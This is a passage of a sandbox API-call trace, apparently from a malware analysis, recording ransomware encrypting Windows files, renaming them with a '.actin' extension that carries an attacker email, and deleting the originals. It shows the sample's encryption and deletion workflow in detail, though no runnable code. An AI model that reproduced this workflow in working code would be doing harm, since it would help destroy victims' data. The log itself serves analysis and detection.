hFile=0x33c, lpBuffer=0x3a1c020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x366fdf8, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesWritten=0x366fdf8*=0x110100, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x330, lpBuffer=0x3a1c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x366fe14, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesRead=0x366fe14*=0x58800, lpOverlapped=0x0) returned 1 [0050.010] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x58810, dwBufLen=0x58810 | out: pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x58810) returned 1 [0050.011] WriteFile (in: hFile=0x33c, lpBuffer=0x3a1c020*, nNumberOfBytesToWrite=0x58810, lpNumberOfBytesWritten=0x366fdf8, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesWritten=0x366fdf8*=0x58810, lpOverlapped=0x0) returned 1 [0050.017] CryptImportKey (in: hProv=0xf466e8, pbData=0x366fd84, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x366fdf0 | out: phKey=0x366fdf0*=0xf71e80) returned 1 [0050.017] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x366fea0, dwFlags=0x0) returned 1 [0050.017] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x40, dwBufLen=0x40 | out: pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x40) returned 1 [0050.017] CryptDestroyKey (hKey=0xf71e80) returned 1 [0050.017] WriteFile (in: hFile=0x33c, lpBuffer=0x3a1c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x366fdf8, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesWritten=0x366fdf8*=0xf2, lpOverlapped=0x0) returned 1 [0050.017] CryptDestroyKey (hKey=0xf71f40) returned 1 [0050.017] CloseHandle (hObject=0x330) returned 1 [0050.017] CloseHandle (hObject=0x33c) returned 1 [0052.043] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZMAIN.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzmain.accde")) returned 1 [0055.320] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x366fea0 | out: pbBuffer=0x366fea0) returned 1 [0055.320] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingfinance_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0055.323] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x366fe38 | out: lpFileSize=0x366fe38*=88064) returned 1 [0055.323] CloseHandle (hObject=0x300) returned 1 [0055.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingfinance_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite")) returned 0x20 [0055.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\windowsapps\\microsoft.bingfinance_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0055.323] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingfinance_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.046] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x366fea0 | out: pbBuffer=0x366fea0) returned 1 [0056.046] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingnews_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.047] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x366fe38 | out: lpFileSize=0x366fe38*=110592) returned 1 [0056.047] CloseHandle (hObject=0x344) returned 1 [0056.047] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingnews_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite")) returned 0x20 [0056.047] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\windowsapps\\microsoft.bingnews_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0056.048] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingnews_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff Thread: id = 33 os_tid = 0xd20 [0045.259] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x33b02c8 [0045.260] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x33c02d0 [0045.260] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x28) returned 0x2a6a450 [0045.260] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x110102) returned 0x3b30020 [0045.263] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a6a480 [0045.263] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe58, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afec0 | out: phKey=0x37afec0*=0xf58ee8) returned 1 [0045.263] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x37afea8, dwFlags=0x0) returned 1 [0045.263] CryptDecrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x37afe74 | out: pbData=0x2a6a480, pdwDataLen=0x37afe74) returned 1 [0045.263] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0045.263] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75e90000 [0045.263] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0045.263] Wow64DisableWow64FsRedirection (in: OldValue=0x37aff10 | out: OldValue=0x37aff10*=0x0) returned 1 [0045.263] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0045.263] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0045.263] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0045.266] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=42674) returned 1 [0045.266] CloseHandle (hObject=0x308) returned 1 [0045.266] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log")) returned 0x20 [0045.266] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.266] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0045.266] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0045.266] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0045.266] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0045.267] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf58ee8) returned 1 [0045.267] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0045.267] ReadFile (in: hFile=0x308, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0xa6b2, lpOverlapped=0x0) returned 1 [0045.281] CryptEncrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xa6c0, dwBufLen=0xa6c0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xa6c0) returned 1 [0045.282] WriteFile (in: hFile=0x30c, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xa6c0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xa6c0, lpOverlapped=0x0) returned 1 [0045.284] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf590a8) returned 1 [0045.284] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0045.284] CryptEncrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70, dwBufLen=0x70 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70) returned 1 [0045.284] CryptDestroyKey (hKey=0xf590a8) returned 1 [0045.284] WriteFile (in: hFile=0x30c, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x122, lpOverlapped=0x0) returned 1 [0045.284] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0045.284] CloseHandle (hObject=0x308) returned 1 [0045.284] CloseHandle (hObject=0x30c) returned 1 [0045.286] DeleteFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log")) returned 1 [0045.287] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0045.287] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0045.288] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=6004) returned 1 [0045.288] CloseHandle (hObject=0x30c) returned 1 [0045.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log")) returned 0x20 [0045.289] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.289] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0045.289] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0045.289] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0045.289] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0045.289] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf58ee8) returned 1 [0045.289] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0045.289] ReadFile (in: hFile=0x30c, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x1774, lpOverlapped=0x0) returned 1 [0045.290] CryptEncrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x1780, dwBufLen=0x1780 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x1780) returned 1 [0045.290] WriteFile (in: hFile=0x308, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x1780, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x1780, lpOverlapped=0x0) returned 1 [0045.291] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf590a8) returned 1 [0045.291] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0045.291] CryptEncrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70, dwBufLen=0x70 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70) returned 1 [0045.291] CryptDestroyKey (hKey=0xf590a8) returned 1 [0045.291] WriteFile (in: hFile=0x308, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x122, lpOverlapped=0x0) returned 1 [0045.292] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0045.292] CloseHandle (hObject=0x30c) returned 1 [0045.292] CloseHandle (hObject=0x308) returned 1 [0045.292] DeleteFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log")) returned 1 [0045.293] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0045.293] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0045.646] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=40) returned 1 [0045.646] CloseHandle (hObject=0x308) returned 1 [0045.646] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log")) returned 0x20 [0045.646] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.646] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0045.646] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0045.646] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0045.646] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0045.711] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf59228) returned 1 [0045.711] CryptSetKeyParam (hKey=0xf59228, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0045.715] ReadFile (in: hFile=0x308, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x28, lpOverlapped=0x0) returned 1 [0045.768] CryptEncrypt (in: hKey=0xf59228, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x30, dwBufLen=0x30 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x30) returned 1 [0045.768] WriteFile (in: hFile=0x304, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x30, lpOverlapped=0x0) returned 1 [0045.769] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf58e68) returned 1 [0045.769] CryptSetKeyParam (hKey=0xf58e68, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0045.769] CryptEncrypt (in: hKey=0xf58e68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x60, dwBufLen=0x60 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x60) returned 1 [0045.769] CryptDestroyKey (hKey=0xf58e68) returned 1 [0045.769] WriteFile (in: hFile=0x304, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x112, lpOverlapped=0x0) returned 1 [0045.769] CryptDestroyKey (hKey=0xf59228) returned 1 [0045.769] CloseHandle (hObject=0x308) returned 1 [0045.770] CloseHandle (hObject=0x304) returned 1 [0045.770] DeleteFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log")) returned 1 [0045.771] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0045.771] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0045.773] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=7567) returned 1 [0045.773] CloseHandle (hObject=0x308) returned 1 [0045.773] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf")) returned 0x80 [0045.773] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.773] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0045.773] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0045.773] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0045.773] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0045.775] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf58ee8) returned 1 [0045.775] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0045.775] ReadFile (in: hFile=0x308, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x1d8f, lpOverlapped=0x0) returned 1 [0045.777] CryptEncrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x1d90, dwBufLen=0x1d90 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x1d90) returned 1 [0045.777] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x1d90, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x1d90, lpOverlapped=0x0) returned 1 [0045.778] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf590a8) returned 1 [0045.778] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0045.778] CryptEncrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0045.778] CryptDestroyKey (hKey=0xf590a8) returned 1 [0045.778] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0045.778] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0045.778] CloseHandle (hObject=0x308) returned 1 [0045.778] CloseHandle (hObject=0x2e4) returned 1 [0045.779] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf")) returned 1 [0045.780] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0045.780] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0045.780] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=74214) returned 1 [0045.780] CloseHandle (hObject=0x2e4) returned 1 [0045.780] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: 